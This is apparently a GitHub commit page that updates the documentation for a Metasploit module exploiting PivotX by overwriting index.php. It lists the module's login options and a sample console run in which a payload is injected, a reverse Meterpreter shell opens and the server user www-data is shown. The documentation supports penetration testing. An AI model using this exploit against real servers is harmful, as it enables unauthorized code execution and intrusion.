Skip to content

Commit 744188f

Browse files
committed
Updates docs
1 parent 2328b40 commit 744188f

File tree

1 file changed

+12
-3
lines changed

1 file changed

+12
-3
lines changed

documentation/modules/exploit/linux/http/pivotx_index_php_overwrite.md

Lines changed: 12 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -23,7 +23,6 @@ Install steps:
2323

2424
## Options
2525

26-
2726
### USERNAME
2827

2928
PivotX username.
@@ -35,14 +34,24 @@ PivotX password.
3534
## Scenarios
3635

3736
```
38-
msf exploit(linux/http/pivotx_rce) > run verbose=true
37+
msf exploit(linux/http/pivotx_index_php_overwrite) > run verbose=true
3938
[*] Started reverse TCP handler on 192.168.168.128:4444
39+
[*] Running automatic check ("set AutoCheck false" to disable)
40+
[+] The target appears to be vulnerable. Detected PivotX 3.0.0.pre.rc3
41+
[*] Logging in PivotX
42+
[*] Modifying file and injecting payload
43+
[*] Triggering payload
4044
[*] Sending stage (40004 bytes) to 192.168.168.146
41-
[*] Meterpreter session 4 opened (192.168.168.128:4444 -> 192.168.168.146:40562) at 2025-07-18 14:20:03 +0200
45+
[*] Meterpreter session 1 opened (192.168.168.128:4444 -> 192.168.168.146:36104) at 2025-08-01 09:38:52 +0200
46+
47+
[*] Restoring original content
4248
49+
meterpreter >
4350
meterpreter > sysinfo
4451
Computer : ubuntu
4552
OS : Linux ubuntu 6.8.0-52-generic #53~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Jan 15 19:18:46 UTC 2 x86_64
4653
Meterpreter : php/linux
54+
meterpreter > getuid
55+
Server username: www-data
4756
4857
```

0 commit comments

Comments
 (0)